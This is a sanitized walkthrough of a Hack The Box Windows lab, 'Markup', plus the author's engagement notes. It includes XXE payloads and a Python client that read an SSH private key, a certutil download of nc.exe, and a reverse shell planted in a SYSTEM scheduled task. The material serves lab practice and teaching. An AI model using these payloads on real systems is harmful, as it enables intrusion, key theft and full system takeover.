
Markup


Difficulty: Easy. Published 2026-02-23. Sanitized local writeup.

Scenario

Markup attack path

  1. Port scan reveals SSH (22), HTTP (80), HTTPS (443) -- Apache 2.4.41 on Windows
  2. Web login with default creds admin:password
  3. Authenticated order form submits XML -- vulnerable to XXE
  4. XXE reads Daniel's SSH private key

Objective

Machine walkthrough focused on evidence, validation, and reusable operator lessons.

Markup sanitized attack graph

Walkthrough flow

  1. nmap -sC -sV -Pn -- expect 22, 80, 443
  2. Web login at port 80: admin:password
  3. Find order form, submit XXE payload to read win.ini...
  4. XXE read daniel's SSH key:...
  5. SSH as daniel, get user.txt from...

Source coverage

Status: complete. This article is generated from 5 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

Evidence verdict

High confidence: the page is reconstructed from a primary walkthrough plus multiple supporting notes or evidence sources. Treat the chain as source-backed, while still checking the listed source files for sensitive values.

  • <TARGET>-Markup/walkthrough.md
  • HTB/<TARGET>-Markup/notes.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Markup__notes.md.125d79b441.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Markup__notes.md.cc892dec91.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Markup__notes.md.c1669bb378.md

Technical Walkthrough

Markup Walkthrough

Machine Info

  • Name: Markup
  • OS: Windows
  • Difficulty: Easy / Starting Point
  • IP: <TARGET> (previously <TARGET> — same machine, new spawn IP)
  • Attacker: <TARGET> (Pwnbox tun0)

Current Status

  • Root flag: CAPTURED -- <hash redacted> (from prior live session)
  • User flag: NOT YET CAPTURED at the time of this status (target offline/despawned); the 2026-05-06 live revalidation recorded in the dossier below captured it
  • Target: Unreachable -- gateway returns Host Unreachable. Machine must be respawned via HTB.

Attack Chain Summary

  1. Port scan reveals SSH (22), HTTP (80), HTTPS (443) -- Apache 2.4.41 on Windows
  2. Web login with default creds admin:password
  3. Authenticated order form submits XML -- vulnerable to XXE
  4. XXE reads Daniel's SSH private key
  5. SSH as daniel -> user flag
  6. Writable scheduled task C:\Log-Management\job.bat (BUILTIN\Users:F) -> overwrite with reverse shell -> task runs it as SYSTEM -> root.txt

Phase 2: Web Enumeration

Login

Navigate to http://<TARGET>/ -- login page.

text
Credentials: admin:password

Post-Auth Exploration

  • Page source/comments reveal username "Daniel"
  • "Order" feature submits XML data via POST

XML Structure

xml
<?xml version="1.0"?>
<order>
  <quantity>1</quantity>
  <item>Something</item>
  <address>123 Street</address>
</order>

Phase 3: XXE Exploitation

Step 1: Validate XXE with win.ini

xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<order>
  <quantity>1</quantity>
  <item>&xxe;</item>
  <address>test</address>
</order>

Step 2: Read Daniel's SSH Private Key

xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/users/daniel/.ssh/id_rsa">]>
<order>
  <quantity>1</quantity>
  <item>&xxe;</item>
  <address>test</address>
</order>

Save returned key to loot/daniel_id_rsa.
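The two payloads above differ only in the entity's SYSTEM URI, so the request is worth scripting once and reusing for every file. The client below is an added example written for this page, not tooling from the original walkthrough. It wraps the entity reference in marker strings so the reflected file content can be cut out of whatever HTML process.php returns, normalises a Windows path into the file:///c:/... form, and can switch to a php://filter base64 wrapper for files whose raw bytes would not survive the XML parser (the notes record PHP 7.2.28 on the target, so the wrapper is available). The endpoint path and cookie handling follow the notes; the response template, the "XXE-BEGIN"/"XXE-END" markers and the sample response are constructed for the example.

```python
"""XXE file-read client for the MegaShopping order form.

Added example for this page, not tooling from the original walkthrough.
Assumes the authenticated form POSTs raw XML to /process.php and that the
<item> text is reflected in the response (as the notes describe); the cookie
string is whatever the web login set. SAMPLE_RESPONSE is constructed.
"""
import base64
import html
import re
import urllib.request
from typing import Optional

# Literal text placed around the entity reference: it is reflected together
# with the file content, so the content can be cut out of any surrounding HTML.
START, END = "XXE-BEGIN", "XXE-END"


def file_uri(path: str, wrapper: bool = False) -> str:
    """Normalise a Windows path to the file:///c:/... form libxml accepts, or
    to a php://filter wrapper that base64-encodes the file server-side (needed
    when the file holds bytes that are not well-formed XML text)."""
    norm = path.replace("\\", "/").lstrip("/")
    if wrapper:
        return f"php://filter/convert.base64-encode/resource={norm}"
    return f"file:///{norm}"


def build_payload(uri: str) -> str:
    """The order XML with an external general entity declared in the DTD."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE root [<!ENTITY xxe SYSTEM "{uri}">]>\n'
        "<order>\n"
        "  <quantity>1</quantity>\n"
        f"  <item>{START}&xxe;{END}</item>\n"
        "  <address>test</address>\n"
        "</order>\n"
    )


def extract(body: str, decode_b64: bool = False) -> Optional[str]:
    """Pull the reflected content from between the markers; None when the
    markers are absent (item not reflected on this code path)."""
    m = re.search(re.escape(START) + r"(.*?)" + re.escape(END), body, re.S)
    if not m:
        return None
    data = html.unescape(m.group(1))  # undo any HTML escaping of the reflection
    if decode_b64:
        data = base64.b64decode(data.strip()).decode("utf-8", "replace")
    return data


def looks_like_win_ini(text: str) -> bool:
    """Cheap validation for step 1: win.ini carries these lines on every Windows."""
    return "[fonts]" in text.lower() or "16-bit app support" in text


def is_private_key(text: str) -> bool:
    return "-----BEGIN" in text and "PRIVATE KEY-----" in text


def xxe_read(base_url: str, cookie: str, path: str, wrapper: bool = False) -> Optional[str]:
    """Send the payload with the authenticated session cookie and return the file."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/process.php",
        data=build_payload(file_uri(path, wrapper)).encode(),
        headers={"Content-Type": "text/xml", "Cookie": cookie},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        return extract(resp.read().decode("utf-8", "replace"), decode_b64=wrapper)


# Constructed response in the shape a reflecting template would produce.
SAMPLE_RESPONSE = (
    "<p>Your order for XXE-BEGIN; for 16-bit app support\n"
    "[fonts]\n[extensions]\n[mci extensions]\nXXE-END has been processed</p>"
)

if __name__ == "__main__":
    content = extract(SAMPLE_RESPONSE)
    print("win.ini check:", looks_like_win_ini(content))
    # Live use (target and cookie are placeholders):
    # key = xxe_read("http://<TARGET>", "<session cookie>", r"C:\Users\daniel\.ssh\id_rsa")
    # if key and is_private_key(key):
    #     open("loot/daniel_id_rsa", "w").write(key)
```

Reading the result tells you which stage failed: no markers at all means the item value is not reflected on that path; an empty string or a literal `&xxe;` between the markers means the DTD was accepted but entity loading is disabled, so the path is not the problem. Files containing NUL or non-UTF-8 bytes make libxml reject the document, which is what wrapper=True is for; the same php://filter wrapper also returns PHP source such as process.php itself instead of executing it.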

Phase 4: Foothold (SSH as Daniel)

bash
chmod 600 loot/daniel_id_rsa
ssh -i loot/daniel_id_rsa daniel@<TARGET>

User Flag

cmd
type C:\Users\daniel\Desktop\user.txt

Phase 5: Privilege Escalation

Identify Writable Scheduled Task

cmd
cd C:\Log-Management
type job.bat
icacls job.bat

Expected: BUILTIN\Users:(F) -- full control for all local users.
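The icacls line above is the decisive check, but on a real host there are usually dozens of tasks to triage and the ACL only matters if the task runs elevated (schtasks /query /v shows the "Run As User" column). The helper below is an added example written for this page, not part of the original notes: it parses saved `schtasks /query /v /fo CSV` and `icacls <file>` output, pairs every task that runs as SYSTEM or an administrator with the ACL of the script it executes, and reports the ones a low-privileged principal can write. Both sample outputs are constructed (the task names and the second task are invented; only the job.bat ACE mirrors the finding on this box), and the sets of "low privileged" principals and write rights are judgement calls you may want to widen, for example with your own account.

```python
"""Scheduled-task hijack triage from captured icacls / schtasks output.

Added example for this page; not part of the original notes. It parses text
the operator saves from two native commands rather than running them:
    schtasks /query /v /fo CSV > tasks.csv
    icacls C:\\Log-Management\\job.bat > job.acl
All sample output below is constructed (task names and the second task are
invented; only the job.bat ACE mirrors the finding in the notes).
"""
import csv
import io
import re
from typing import Dict, List, Optional, Set, Tuple

# Principals any local user can act as; write access for them on a script
# that a privileged task runs is the finding.
LOW_PRIV = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# icacls simple rights that allow modifying the file, plus the granular
# write-data / append-data rights that appear in non-simple ACEs.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}

ACE_RE = re.compile(r"^(?P<who>[^:]+?):(?P<rights>(?:\([^)]*\))+)\s*$")
SCRIPT_RE = re.compile(r'([A-Za-z]:\\[^"\s]+?\.(?:bat|cmd|ps1|vbs|exe))', re.I)


def parse_icacls(output: str, path: str) -> Dict[str, Set[str]]:
    """Map principal (lower-cased) -> set of rights from `icacls <path>` output.
    The first line starts with the path, later ACEs are indented continuation
    lines, and the trailing 'Successfully processed' summary has no ACE."""
    aces: Dict[str, Set[str]] = {}
    for raw in output.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        tokens: Set[str] = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("rights")):
            tokens.update(t.strip() for t in group.split(","))
        aces[m.group("who").lower()] = tokens - INHERIT_FLAGS
    return aces


def writable_by_low_priv(aces: Dict[str, Set[str]]) -> List[str]:
    return sorted(who for who, rights in aces.items()
                  if who in LOW_PRIV and rights & WRITE_RIGHTS)


def parse_schtasks(csv_text: str) -> List[Tuple[str, str, str]]:
    """(TaskName, Task To Run, Run As User) rows from `schtasks /query /v /fo CSV`.
    Verbose CSV output repeats the header line, so header rows are skipped."""
    rows = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["TaskName"] == "TaskName":
            continue
        rows.append((row["TaskName"], row["Task To Run"], row["Run As User"]))
    return rows


def script_path(task_to_run: str) -> Optional[str]:
    """First absolute script/binary path in the task's command line."""
    m = SCRIPT_RE.search(task_to_run)
    return m.group(1) if m else None


def runs_privileged(run_as: str) -> bool:
    u = run_as.lower()
    return "system" in u or "administrator" in u


def find_hijackable(csv_text: str, icacls_by_path: Dict[str, str]):
    """Tasks that run privileged from a file a low-priv principal can write.
    icacls_by_path maps a lower-cased script path to its captured icacls output."""
    findings = []
    for name, cmd, run_as in parse_schtasks(csv_text):
        path = script_path(cmd)
        if not path or not runs_privileged(run_as):
            continue
        acl = icacls_by_path.get(path.lower())
        if acl is None:
            continue  # not captured yet: go run icacls on it
        who = writable_by_low_priv(parse_icacls(acl, path))
        if who:
            findings.append((name, path, run_as, who))
    return findings


# ---- constructed sample output (not captured from the target) -------------
SCHTASKS_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type"
"MARKUP","\Log-Management","cmd.exe /c C:\Log-Management\job.bat","SYSTEM","Minute"
"HostName","TaskName","Task To Run","Run As User","Schedule Type"
"MARKUP","\Maintenance\Cleanup","C:\Windows\System32\cleanmgr.exe /autoclean","SYSTEM","Daily"
'''

ICACLS_BY_PATH = {
    r"c:\log-management\job.bat": r"""C:\Log-Management\job.bat BUILTIN\Users:(F)
                          NT AUTHORITY\SYSTEM:(I)(F)
                          BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
""",
    r"c:\windows\system32\cleanmgr.exe": r"""C:\Windows\System32\cleanmgr.exe NT SERVICE\TrustedInstaller:(F)
                                 BUILTIN\Administrators:(RX)
                                 NT AUTHORITY\SYSTEM:(RX)
                                 BUILTIN\Users:(RX)

Successfully processed 1 files; Failed processing 0 files
""",
}

if __name__ == "__main__":
    for task, path, run_as, who in find_hijackable(SCHTASKS_CSV, ICACLS_BY_PATH):
        print(f"{task}: {path} runs as {run_as}, writable by {', '.join(who)}")
```

On this box the only hit is the Log-Management task; the second, invented task has the same Run As User but a read-only ACL for Users, which is why the ACL check and the run-as check have to be combined rather than either alone.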

Upload nc.exe

From Pwnbox:

bash
cp /usr/share/windows-binaries/nc.exe /tmp/nc.exe
cd /tmp && python3 -m http.server 8000

On target (as daniel):

cmd
certutil -urlcache -f http://<TARGET>:8000/nc.exe C:\Log-Management\nc.exe

Overwrite job.bat

cmd
echo C:\Log-Management\nc.exe -e cmd.exe <TARGET> 4444 > C:\Log-Management\job.bat

Listen for Reverse Shell

On Pwnbox:

bash
nc -lvnp 4444

Wait for scheduled task execution. When shell connects:

cmd
whoami
type C:\Users\Administrator\Desktop\root.txt

Root Flag

Captured: <hash redacted> (verified 32-char hex)

Flags

Flag | Value | Status
User | TBD | Pending at time of writing (target offline); captured in the 2026-05-06 revalidation, see dossier below
Root | <hash redacted> | Captured

Lessons Learned

  1. XXE on Windows: File URIs use file:///c:/path format (forward slashes, triple slash after protocol)
  2. SSH keys via XXE: Private keys are high-value XXE targets on Windows when SSH is present
  3. Scheduled tasks with weak ACLs: Always check icacls on batch files -- they may run elevated
  4. job.bat reversion: The scheduled task may revert job.bat frequently; be quick with the overwrite or retry

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

  • Target: Markup
  • Difficulty: Easy / Starting Point
  • OS: Windows
  • IP: <TARGET> (previously <TARGET>)
  • Local workspace: <local workspace><TARGET>-Markup

Engagement Details

  • Pwnbox: <<secret redacted>>@<TARGET> (VPN IP: <TARGET>)
  • VPN: Connected, tun0 up with <TARGET>
  • Difficulty Mode: Easy (timebox 20 min per vector, target solve 45-60 min)

Evidence Ledger

Timestamp | Command | Output file | Finding | Confidence | Next action
2026-05-05T08:39 | sudo nmap -Pn -sS -p 22,80,443 <TARGET> | (inline) | All 3 ports filtered. Traceroute: !H from gateway. | High | Machine not spawned.
2026-05-05 (prior) | cat /tmp/rootflag.txt | loot/root.txt | Root flag: <hash redacted> (32-char hex) | High | Already captured from live session.

Status

BLOCKED: Target <TARGET> is not reachable. Gateway returns "Host Unreachable." Machine needs to be spawned via HTB platform.

Root flag: <hash redacted> -- CAPTURED (from prior live session, saved to loot/root.txt)

User flag: NOT YET CAPTURED -- requires live target

Attack Chain (Ready to Execute When Machine is Up)

  1. nmap -sC -sV -Pn <TARGET> -- expect 22, 80, 443
  2. Web login at port 80: admin:password
  3. Find order form, submit XXE payload to read win.ini (validate)
  4. XXE read daniel's SSH key: file:///c:/users/daniel/.ssh/id_rsa
  5. SSH as daniel, get user.txt from C:\Users\daniel\Desktop\user.txt
  6. Check C:\Log-Management\job.bat ACLs -- BUILTIN\Users:(F)
  7. Upload nc.exe via certutil, overwrite job.bat, catch reverse shell on 4444
  8. Get root.txt from C:\Users\Administrator\Desktop\root.txt

Notes

Scope

  • Target IP: <TARGET>
  • Attacker IP: <TARGET>
  • Pwnbox SSH: <<secret redacted>>@<TARGET>
  • OS: Windows (Apache 2.4.41 Win64, OpenSSH 8.1, PHP 7.2.28)
  • Difficulty: Easy
  • Date: 2026-05-05

Confirmed Ports (from user nmap)

Port | Service | Version
22 | SSH | OpenSSH for Windows 8.1
80 | HTTP | Apache 2.4.41 Win64, PHP 7.2.28, "MegaShopping"
443 | HTTPS | Apache 2.4.41 Win64

Evidence Ledger

Timestamp | Action | Finding | Next
T+0 | Ping target | TTL=127 confirms Windows, target live | Web login
T+1 | POST / with admin:<REDACTED> | Session cookie set | Find order form
T+2 | GET /services.php | Order form sends XML to process.php; HTML comment reveals user "Daniel" | XXE test
T+3 | XXE win.ini | file:///c:/windows/win.ini contents reflected in response | Read SSH key
T+4 | XXE id_rsa | Daniel's OpenSSH private key extracted | SSH as Daniel
T+5 | SSH daniel@target | whoami = markup\daniel; user.txt captured | Privesc
T+6 | icacls job.bat | BUILTIN\Users:(F) confirmed, full write access | Overwrite job.bat
T+7 | SCP nc.exe | nc.exe (28160 bytes) delivered to C:\Log-Management\ | Set up reverse shell
T+8 | Overwrite job.bat | copy root.txt to C:\Log-Management\ | Wait for task
T+9 | type root.txt | Root flag captured from copied file | DONE
2026-05-06 AEST | Live revalidation against <TARGET> (outputs: enum/login-admin-20260506.txt, enum/xxe-daniel-key-20260506.raw, loot/daniel_id_rsa, loot/user.txt, enum/user-flag-verify-20260506.txt) | Revalidated web login, XXE key extraction, SSH as Daniel, and captured user flag from C: <REDACTED> | -

Flags

  • User: <<secret redacted>> (C:\Users\daniel\Desktop\user.txt)
  • Root: <<secret redacted>> (C:\Users\Administrator\Desktop\root.txt)

Key Findings

  1. Default credentials admin:<REDACTED>
  2. XXE vulnerability in order XML processing (process.php)
  3. Source comment discloses username "Daniel"
  4. Daniel's SSH private key readable via XXE at file:///c:/users/daniel/.ssh/id_rsa
  5. Insecure ACL on C:\Log-Management\job.bat — BUILTIN\Users:(F)
  6. Scheduled task runs job.bat as SYSTEM — abused to copy Admin flag

Attack Chain

text
Web Login (admin:<REDACTED>)
  -> XXE (file read via process.php)
    -> SSH Key Exfil (daniel's id_rsa)
      -> SSH as daniel (user flag)
        -> Writable job.bat (BUILTIN\Users:F)
          -> Scheduled task executes as SYSTEM
            -> Root flag copied to readable location

Notes

Scope

  • Target: Markup
  • Difficulty: Easy / Very Easy
  • OS: Windows
  • Current known IP: <TARGET>
  • Local workspace: <local workspace><TARGET>-Markup

Evidence Rule

Public research in research.md is advisory only. Record only live target evidence in this file.

Engagement Details

  • Pwnbox: <<secret redacted>>@<TARGET> (VPN IP: <TARGET>)
  • VPN: edge-au-dedivip-1.hackthebox.eu:1337 (connected, tun0 up)
  • Difficulty Mode: Easy (timebox 20 min per vector, target solve 45-60 min)

Evidence Ledger

Timestamp | Command | Output file | Finding | Confidence | Next action
2026-05-05T08:14 | nmap -Pn -sS top 20 ports | (no file - all filtered) | Target <TARGET> unreachable - "No route to host". Machine not spawned. | High | Respawn machine on HTB platform and retry.
2026-05-05T08:15 | curl -sv http://<TARGET>/ | (inline) | "connect failed: No route to host" after 3180ms | High | Confirm VPN OK (confirmed), machine needs respawn.
2026-05-05T08:16 | Nearby IP range scan <TARGET>-195 | (inline) | All filtered; no active HTB machines in range. | High | Target must be respawned via HTB platform.
2026-05-05T08: <REDACTED>

Status

BLOCKED: Target machine <TARGET> is currently despawned/offline. VPN tunnel is healthy (tun0: <TARGET>, route to <TARGET>/16 via tun0), but all ports return "filtered" and curl returns "No route to host."

Root flag: <REDACTED>

User flag: <REDACTED>

Next Steps (When Machine is Respawned)

  1. Run nmap: nmap -sC -sV -Pn -oN nmap/initial <TARGET>
  2. Verify HTTP on port 80, try admin:<REDACTED>
  3. Find XML order form, confirm XXE with win.ini read
  4. Read daniel's SSH key via XXE
  5. SSH as daniel, grab user.txt
  6. Verify job.bat ACL, upload nc.exe, overwrite job.bat, catch shell as SYSTEM
  7. Grab root.txt (verify matches saved flag)